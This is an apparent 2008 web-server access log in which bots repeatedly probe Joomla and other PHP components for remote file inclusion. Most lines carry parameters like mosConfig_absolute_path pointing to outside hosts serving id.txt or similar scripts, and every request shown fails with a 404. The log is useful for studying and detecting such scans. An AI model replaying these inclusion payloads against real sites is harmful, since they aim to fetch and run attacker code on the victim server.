82.135.207.90 - - [19/Feb/2008:04:00:20 -0800] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.38.34.152 - - [19/Feb/2008:04:00:22 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.160.16.3 - - [19/Feb/2008:04:01:37 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [19/Feb/2008:04:01:42 -0800] "GET /logs/access_080211.log/test.php?page=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [19/Feb/2008:04:01:43 -0800] "GET /test.php?page=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [19/Feb/2008:04:01:43 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [19/Feb/2008:04:01:43 -0800] "GET /logs/test.php?page=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [19/Feb/2008:04:01:45 -0800] "GET /logs/access_080117.log/test.php?page=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.76.29 - - [19/Feb/2008:04:01:46 -0800] "GET /logs/access_080211.log/index.php?option=com_joomlaflashfun&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [19/Feb/2008:04:01:47 -0800] "GET /logs/index.php?option=com_joomlaflashfun&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:02:37 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:02:47 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:02:48 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:48 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:49 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:02:49 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:49 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:49 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:02:49 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:49 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:49 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:52 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:52 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:52 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:02:52 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:52 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:52 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:02:53 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:53 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:53 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:54 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:54 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:54 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:54 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:02:54 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:02:55 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:55 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:55 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:55 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:55 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:56 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:56 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:56 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:56 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:02:56 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:03:01 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:03:01 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:03:02 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:03:06 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:03:06 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:03:06 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:03:06 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:03:06 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:03:06 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:03:07 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:03:08 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:09 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:10 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:10 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:03:12 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:14 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:14 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:15 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:15 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:15 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:15 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:15 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:15 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:15 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:15 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:15 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:03:16 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:03:27 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:03:33 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:03:34 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:03:34 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
201.134.127.27 - - [19/Feb/2008:04:03:40 -0800] "GET //errors.php?error=http://www.sociallyhot.com/admin/zey.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:04:03 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:04:03 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:04:04 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:04:07 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:04:07 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:04:09 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:04:04:10 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:04:11 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:04:04:13 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:04:20 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:04:24 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:04:27 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:04:32 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:04:45 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:04:48 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:04:49 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:04:50 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:04:55 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
69.64.76.29 - - [19/Feb/2008:04:04:57 -0800] "GET /logs/access_080201.log/index.php?option=com_joomlaflashfun&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:04:05:03 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:05:12 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:04:05:18 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
74.53.3.206 - - [19/Feb/2008:04:05:22 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
74.53.3.206 - - [19/Feb/2008:04:05:22 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:04:05:36 -0800] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:04:05:36 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:04:05:36 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.170.21.81 - - [19/Feb/2008:04:06:45 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.170.21.81 - - [19/Feb/2008:04:06:45 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.170.21.81 - - [19/Feb/2008:04:06:45 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.239.6.64 - - [19/Feb/2008:04:07:16 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
